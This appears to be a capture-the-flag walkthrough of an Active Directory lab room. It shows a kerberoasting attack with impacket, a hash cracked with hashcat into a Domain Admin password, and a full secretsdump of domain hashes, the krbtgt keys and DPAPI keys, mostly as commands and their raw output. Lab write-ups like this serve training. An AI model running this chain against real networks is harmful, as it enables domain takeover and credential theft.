For this room, we are given known user credentials:
Username: corp\dark
Password: _QuejVudId6
Initial Scan
nmap -Pn -A 10.10.150.225
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-18 18:28 EDT
Nmap scan report for 10.10.150.225
Host is up (0.20s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-18 22:28:42Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: corp.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: corp.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=omega.corp.local
| Not valid before: 2024-09-17T21:33:32
|_Not valid after: 2025-03-19T21:33:32
|_ssl-date: 2024-09-18T22:29:33+00:00; -1s from scanner time.
| rdp-ntlm-info:
| Target_Name: CORP
| NetBIOS_Domain_Name: CORP
| NetBIOS_Computer_Name: OMEGA
| DNS_Domain_Name: corp.local
| DNS_Computer_Name: omega.corp.local
| DNS_Tree_Name: corp.local
| Product_Version: 10.0.17763
|_ System_Time: 2024-09-18T22:28:53+00:00
Service Info: Host: OMEGA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-09-18T22:28:57
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.33 seconds
Server appears to be a domain controller with RDP enabled on it.
Impacket
GetUserSPNs
impacket-GetUserSPNs corp.local/dark -dc-ip 10.10.150.225 -request
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ---- ------------------------------------------ -------------------------- -------------------------- ----------
HTTP/fela fela CN=Domain Admins,CN=Users,DC=corp,DC=local 2019-10-09 13:54:40.905204 2019-10-10 23:39:12.562404
HOST/fela@corp.local fela CN=Domain Admins,CN=Users,DC=corp,DC=local 2019-10-09 13:54:40.905204 2019-10-10 23:39:12.562404
HTTP/fela@corp.local fela CN=Domain Admins,CN=Users,DC=corp,DC=local 2019-10-09 13:54:40.905204 2019-10-10 23:39:12.562404
[-] CCache file is not found. Skipping...
$krb5tgs$23$*fela$CORP.LOCAL$corp.local/fela*$00735746f0ce46a5f7d2d9bebacf0969$bbcc71c99abb78f2fa42cc2f65b7bfa24e427171b71ca41d270e29e0311c2ecbf3ac6c6c8b8f518eadf6856ac0e405a85b8eb422b1a502417bd9f5b566bf983dfb736ef5d54a2d0d401ecd9ce688009307926290c47cf975f08ad588a714bd6655e15d7276eeef7dbece2973d91fb0f3cee11e84d1394189dca212d06e942cc4761f993ccaa47686a141eeb8e522e75358b19ecdcf613317c3cdd70ef60fb31e6767df8bbbf726cc84693ae83a49d4049d1d01e1ed2c2e002a0eaf20e4692059b4d3f19eccd32aac01b3113c62d2b7ee57c61f2721aa8c40a647ed25c5b71fd987b920dae15451404b728274551324b4cf592d8ba1be2e56951c0147ab5a9b3ebdcd4496398dcd20e84e52b474845d13620cf4753a913966ca64aef908a685cf7d900eb10033ed0b2fe3481a659e607b5f8bcbd8866a67bf31ed168dd00e4b658dbbf47901e5d8d056e7d9309aa16387fe3203498a453ab0b9b51db2c0dacebbf67506ab0c554d11b483ce7b00e9dbc4ad82807fdb07fe9ec419595da3605ef406f18aab77439fa3836f7e86fdac44c16c4565268d89db840aa15c23de3b4c957ede5ba80d77c43d49c19469b733bc7296877e01b273bcd825f655710a6c5f6d0fbfa943be37e62339a10783a774a0ad8a7e2b5918ce5780931aed24233b5b7b072ece5d9a9d249694265495be939eae8b4fd62a09af6b197ed6e388e00354a4a7bb6bab91115e6fca37cba7b6645f75d7e447664e56dfc2cd72aa9238f30d86815073419d63b9a972530860402d820c03256ee228cdd497d4628aef74e6bb1557eb24328e3c8dc3f37b814f7fea0230f2c0ca75fedc3a6603b9f45f388112543de9ed15ae2a958e7f11190835d68bfc1a180909b04d7f18b284f626d755368629bb7c9de4deaf100614a645fc6cb5f326a5910d978001465a51d602035f9f27d42fe48100b239395d3fe7a1bd067798954d710d103b008c617d78f6c381aaa731702ca40ac70a5a8dd6d71682721e06a134692a402646c6c7ac982baa02af5a26c4cc02090a7def1d398dcee05c4f89db3827f2af08f0830e101898760c4434f3581d49a384c78700dadfdab71ab3f1ed3cfaac2cd0b5d07e26ad60afa0827e33626f71d073755bc4dfe08b3339874528731860ef3f711c218016013beb3d4b0ce12ea64c4821ea479d54c05af34212413d5192df98773a1a1720765ea77588565fdae376dd516ee2afce249390dc214630f7c73031cd
hashcat -m 13100 fela-hash.txt /usr/share/wordlist/rockyou.txt finds the password RubenF124
Secretsdump
impacket-secretsdump fela@10.10.150.225
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf34eeca496d6501d9d6a2affb8ed97b0
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:4f4a4a1f282b3b51a3d57aecc23ca084:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
CORP\OMEGA$:aes256-cts-hmac-sha1-96:e6383041c9bd3d67f482fa99ff0737156cbea5fcac57ccbdc6ecd78dbfd73f27
CORP\OMEGA$:aes128-cts-hmac-sha1-96:9152351754140a851b5b06e28bc0b2fd
CORP\OMEGA$:des-cbc-md5:70efdfd0e0f75175
CORP\OMEGA$:plain_password_hex:19b2ce9ea75b9be26eb318f377421fe6ca3539225bad7457f98e0854de613076f08d6d3987eb1cebf91226594b104162a9c807cd0afa3b8872ebbdff5b7515de3ad17409c91777c83bfe15666884c4b34657029246d0f4da2bc397825c348b2e0d21e933305e8d1096beae11d945fac4ff3652a617677224b2ab27488e0c3a7d167ce160d136e58e0d123ab4e84acbdbc72408cff4a65e22fda73df757f1b15123713921def67482a8983e2f5c6df5683078fd32b271b1c5a4a9ccf5a3a9808ef39747437a61de4e3bf69f45d7b970c47a2d3b161fae0ca2bf8f0d697c7b5d1596e66b3abf475991efb4be6d972d1334
CORP\OMEGA$:aad3b435b51404eeaad3b435b51404ee:309ba72b55e002a6135728501682e405:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x12d33b66b64dd47d29306031505c48c010eaa5e9
dpapi_userkey:0xc0e9a6202b6e048ecc6510c57f4ee55b10dabf7f
[*] NL$KM
0000 8D D2 8E 67 54 58 89 B1 C9 53 B9 5B 46 A2 B3 66 ...gTX...S.[F..f
0010 D4 3B 95 80 92 7D 67 78 B7 1D F9 2D A5 55 B7 A3 .;...}gx...-.U..
0020 61 AA 4D 86 95 85 43 86 E3 12 9E C4 91 CF 9A 5B a.M...C........[
0030 D8 BB 0D AE FA D3 41 E0 D8 66 3D 19 75 A2 D1 B2 ......A..f=.u...
NL$KM:8dd28e67545889b1c953b95b46a2b366d43b9580927d6778b71df92da555b7a361aa4d8695854386e3129ec491cf9a5bd8bb0daefad341e0d8663d1975a2d1b2
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bd839bd6be092b794013e25068820d15:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:282553039baf6af1231d797992eb9d88:::
corp.local\fela:1132:aad3b435b51404eeaad3b435b51404ee:f0c9407ac6b882d8ee897a4290324807:::
corp.local\dark:1134:aad3b435b51404eeaad3b435b51404ee:1e933fd0cee562288abc9bddccd8c8ce:::
OMEGA$:1009:aad3b435b51404eeaad3b435b51404ee:309ba72b55e002a6135728501682e405:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:099a54fc06b02195e7559b58ecbfeb80f86c6d9141e00f530d5b8a497c01d289
Administrator:aes128-cts-hmac-sha1-96:1f7803cb3e656f8da4efe5bf42df0a8b
Administrator:des-cbc-md5:7629a467c7a42fe0
krbtgt:aes256-cts-hmac-sha1-96:e4c8912572c53c3335478aa9b224631baaa0478572ae4043c9be246a85717d25
krbtgt:aes128-cts-hmac-sha1-96:d126bf12602108ba9ac351ef7c5f3966
krbtgt:des-cbc-md5:cd7cd53ba285cb1c
corp.local\fela:aes256-cts-hmac-sha1-96:c2cd88039840a8041f682116987085b4f1542ba23e6d4f1c35e30e94805e8f17
corp.local\fela:aes128-cts-hmac-sha1-96:d20625ddf73e31ea4ff960365c19ec13
corp.local\fela:des-cbc-md5:c45732734c91ec7f
corp.local\dark:aes256-cts-hmac-sha1-96:2b8b4b3ad70fae63ac290fa4547509127960c5c0abd1b17e10624aa531ed46f4
corp.local\dark:aes128-cts-hmac-sha1-96:dcd64c0eeb1d1655976c1b564636920e
corp.local\dark:des-cbc-md5:b9d3ab4a46adda4c
OMEGA$:aes256-cts-hmac-sha1-96:e6383041c9bd3d67f482fa99ff0737156cbea5fcac57ccbdc6ecd78dbfd73f27
OMEGA$:aes128-cts-hmac-sha1-96:9152351754140a851b5b06e28bc0b2fd
OMEGA$:des-cbc-md5:8626dce39da8203b
[*] Cleaning up...
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up...
[*] Stopping service RemoteRegistry
Exception ignored in: <function Registry.__del__ at 0x7f0bdbb3e340>
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 182, in __del__
File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 179, in close
File "/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py", line 358, in close
File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 603, in closeFile
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1354, in close
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 471, in sendSMB
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 440, in signSMB
File "/usr/lib/python3/dist-packages/impacket/crypto.py", line 148, in AES_CMAC
File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/AES.py", line 228, in new
KeyError: 'Cryptodome.Cipher.AES'
Exception ignored in: <function Registry.__del__ at 0x7f0bdbb3e340>
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 182, in __del__
File "/usr/lib/python3/dist-packages/impacket/winregistry.py", line 179, in close
File "/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py", line 358, in close
File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 603, in closeFile
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1354, in close
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 471, in sendSMB
File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 440, in signSMB
File "/usr/lib/python3/dist-packages/impacket/crypto.py", line 148, in AES_CMAC
File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/AES.py", line 228, in new
KeyError: 'Cryptodome.Cipher.AES'
There’s a few things of interest here, but trying to crack the admin hash is not practical.
Using WinPeas or PowerUp helps us discover the xml file with a clear text password.
Admin password was in:
C:\Windows\Panther\Unattend
Decoded the base64 within and then used the password to log in and grab the last flag.